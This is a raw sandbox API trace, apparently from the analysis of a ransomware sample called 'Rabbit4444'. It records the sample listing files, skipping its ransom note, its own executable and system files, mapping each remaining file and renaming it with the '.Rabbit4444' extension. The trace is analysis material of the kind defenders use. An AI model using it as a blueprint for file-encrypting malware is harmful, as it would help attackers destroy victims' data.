RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.520] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14983040229) returned 1 [0058.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0058.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.520] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.520] CloseHandle (hObject=0x298) returned 1 [0058.520] CloseHandle (hObject=0x278) returned 1 [0058.520] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms.Rabbit4444") returned 192 [0058.520] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{31dd3da1-ed44-4ba8-a67b-6ea93dea77e7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{31dd3da1-ed44-4ba8-a67b-6ea93dea77e7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.521] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fb1b94, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x47fb1b94, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", cAlternateFileName="CLC12E~1.SET")) returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2=".") returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="..") returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="windows") returned -1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="boot") returned 1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.521] lstrcmpiW (lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.521] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms" | out: lpString1="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms") returned="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms" [0058.521] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.521] lstrlenW (lpString="Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms") returned 64 [0058.521] lstrlenW (lpString="Rabbit4444") returned 10 [0058.521] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.521] lstrlenW (lpString=".dll") returned 4 [0058.521] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.522] lstrlenW (lpString=".lnk") returned 4 [0058.522] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.522] lstrlenW (lpString=".ini") returned 4 [0058.522] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.522] lstrlenW (lpString=".sys") returned 4 [0058.522] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.522] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33843db0-24e7-4682-a019-5393d7f2bffa}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.522] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.522] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14983274344) returned 1 [0058.522] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=924) returned 1 [0058.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.522] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.523] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.525] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14983552779) returned 1 [0058.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.525] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.525] CloseHandle (hObject=0x298) returned 1 [0058.525] CloseHandle (hObject=0x278) returned 1 [0058.525] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms.Rabbit4444") returned 192 [0058.525] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33843db0-24e7-4682-a019-5393d7f2bffa}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33843db0-24e7-4682-a019-5393d7f2bffa}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.526] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49252171, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x49252171, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", cAlternateFileName="CL99CB~1.SET")) returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2=".") returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="..") returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="windows") returned -1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="boot") returned 1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.526] lstrcmpiW (lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.526] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms" | out: lpString1="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms") returned="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms" [0058.526] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.526] lstrlenW (lpString="Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms") returned 64 [0058.526] lstrlenW (lpString="Rabbit4444") returned 10 [0058.527] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.527] lstrlenW (lpString=".dll") returned 4 [0058.527] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.527] lstrlenW (lpString=".lnk") returned 4 [0058.527] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.527] lstrlenW (lpString=".ini") returned 4 [0058.527] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.527] lstrlenW (lpString=".sys") returned 4 [0058.527] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33f1f9b5-bd94-4d77-96ae-62f10e4a010a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.527] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.527] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14983783963) returned 1 [0058.527] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=973) returned 1 [0058.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.527] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.528] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.529] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.530] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14984039713) returned 1 [0058.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.530] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.530] CloseHandle (hObject=0x298) returned 1 [0058.530] CloseHandle (hObject=0x278) returned 1 [0058.530] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms.Rabbit4444") returned 192 [0058.530] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33f1f9b5-bd94-4d77-96ae-62f10e4a010a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{33f1f9b5-bd94-4d77-96ae-62f10e4a010a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.531] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498ba6b7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x498ba6b7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", cAlternateFileName="CLE5C9~1.SET")) returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2=".") returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="..") returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="windows") returned -1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="boot") returned 1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.531] lstrcmpiW (lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.531] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms" | out: lpString1="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms") returned="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms" [0058.531] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.532] lstrlenW (lpString="Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms") returned 64 [0058.532] lstrlenW (lpString="Rabbit4444") returned 10 [0058.532] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.532] lstrlenW (lpString=".dll") returned 4 [0058.532] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.532] lstrlenW (lpString=".lnk") returned 4 [0058.532] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.532] lstrlenW (lpString=".ini") returned 4 [0058.532] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.532] lstrlenW (lpString=".sys") returned 4 [0058.532] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36c8b34b-83f9-4704-b817-9ab1a723705a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.532] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14984293310) returned 1 [0058.532] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=898) returned 1 [0058.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.532] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0058.533] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0058.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.535] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14984553495) returned 1 [0058.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.535] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.535] CloseHandle (hObject=0x298) returned 1 [0058.535] CloseHandle (hObject=0x278) returned 1 [0058.535] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms.Rabbit4444") returned 192 [0058.535] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36c8b34b-83f9-4704-b817-9ab1a723705a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36c8b34b-83f9-4704-b817-9ab1a723705a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.536] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a7088c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4a7088c8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", cAlternateFileName="CLBA8C~1.SET")) returned 1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.536] lstrcmpiW 